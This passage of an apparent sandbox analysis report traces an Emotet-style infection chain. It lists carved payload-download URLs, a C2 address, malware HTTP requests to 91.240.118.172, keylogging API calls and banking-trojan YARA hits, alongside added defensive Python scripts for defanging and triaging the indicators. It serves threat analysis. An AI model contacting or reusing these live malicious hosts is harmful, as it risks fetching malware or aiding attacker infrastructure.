Source: rundll32.exe, 00000011.00000002.667109716.00000000007D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1
    Host: jurnalpjf.lan.go.id
    Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172 (reported 21 times; the host is contacted by IP literal, so no DNS lookup precedes the connections)
Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
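The URL strings above were carved from process memory, so several of them are cut-off prefixes of the same URL (for example the three gudangtasorichina.com fragments) and one carries a trailing `;`. The following is an added example, not part of the Joe Sandbox report: a small triage script that parses lines in the report's own format, drops fragments that are strict prefixes of a longer string from the same host, maps the carving process to a stage of the chain (an assumption: strings in powershell.exe memory are treated as the payload download locations, strings in rundll32.exe memory as C2), and emits defanged indicators. The ten report lines are embedded verbatim as the constructed input.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: the ten 'String found in binary or memory' lines from the
# Networking section of the report, copied verbatim.
REPORT_LINES = r"""
Source: rundll32.exe, 00000011.00000002.666782333.00000000001DD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.667122057.00000000007E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 00000011.00000002.667077231.0000000000799000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/r
Source: rundll32.exe, 00000011.00000002.667057361.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih
Source: rundll32.exe, 00000011.00000002.667109716.00000000007D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
"""

# 'Source: <process>, <dump>[, <process>, <dump>] String found in binary or memory: <url>'
LINE_RE = re.compile(r"^Source:\s+(?P<proc>[\w.-]+),.*?String found in binary or memory:\s+(?P<url>\S+)\s*$")

# Assumed mapping from the carving process to the stage of the infection chain.
STAGE_BY_PROCESS = {"powershell.exe": "payload download", "rundll32.exe": "c2"}


def parse(lines):
    """Return (process, url) pairs; trailing punctuation carved with the string is stripped."""
    pairs = []
    for line in lines.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            pairs.append((m["proc"], m["url"].rstrip(";,)'\"")))
    return pairs


def collapse(urls):
    """Drop every URL that is a strict prefix of another URL in the set (memory truncation)."""
    return {u for u in urls if not any(o != u and o.startswith(u) for o in urls)}


def triage_urls(lines):
    """Group URLs by host, collapse prefix fragments, and tag each host with its stage."""
    by_host = defaultdict(lambda: {"stage": set(), "urls": set()})
    for proc, url in parse(lines):
        host = urlsplit(url).hostname
        by_host[host]["stage"].add(STAGE_BY_PROCESS.get(proc, proc))
        by_host[host]["urls"].add(url)
    for info in by_host.values():
        info["urls"] = collapse(info["urls"])
    return dict(by_host)


def defang(url):
    """hxxps://h[.]o[.]s[.]t:port/path form for safe inclusion in a report."""
    p = urlsplit(url)
    netloc = p.hostname.replace(".", "[.]") + (f":{p.port}" if p.port else "")
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.replace('http', 'hxxp')}://{netloc}{p.path}{query}"


def report(lines):
    """One defanged line per surviving URL, prefixed with the stage it was carved from."""
    out = []
    for host, info in sorted(triage_urls(lines).items()):
        for url in sorted(info["urls"]):
            out.append(f"{'/'.join(sorted(info['stage']))}\t{defang(url)}")
    return out


if __name__ == "__main__":
    print("\n".join(report(REPORT_LINES)))
```

Prefix collapsing cannot distinguish a genuinely short path from a cut-off string, so `https://160.16.102.168/r` survives next to the long `:80/qcz...` URL and the analyst has to decide; the scheme/port mismatch (`https://` on port 80) on that host is itself a useful feature to hunt for in proxy logs.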

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud

barindex
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.990000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f90000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.29f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3120000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.520000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.22e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ab0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2260000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c40000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2ee0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c90000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
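The Yara hits above name two kinds of artifact: unpacked PE images (`<process index>.<phase>.<process>.<base>.<n>[.raw].unpack`) and raw memory dumps (`<index hex>.<phase>.<seq>.<address>.<field>.<field>.<field>.<field>.sdmp`). Read together they tell you which rundll32.exe instances carry the Emotet payload and where it lives. The following is an added example, not part of the report: a parser that groups the hits by process index and flags executable memory that is not backed by a file. It assumes that the fifth and seventh dot-separated fields of a `.sdmp` name carry the Win32 page protection and memory type (the values on this page, 0x04/0x20/0x40 and 0x20000/0x1000000, are consistent with `PAGE_READWRITE`/`PAGE_EXECUTE_READ`/`PAGE_EXECUTE_READWRITE` and `MEM_PRIVATE`/`MEM_IMAGE`, but that reading is an assumption). The input is a constructed subset of the lines above.

```python
import re
from collections import defaultdict

# Assumed meaning of the 5th and 7th fields of a .sdmp name (Win32 constants).
PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x04, 0x20, 0x40
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

# Constructed input: a representative subset of the 'Yara match File source'
# lines from the E-Banking Fraud section, copied verbatim.
YARA_LINES = r"""
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
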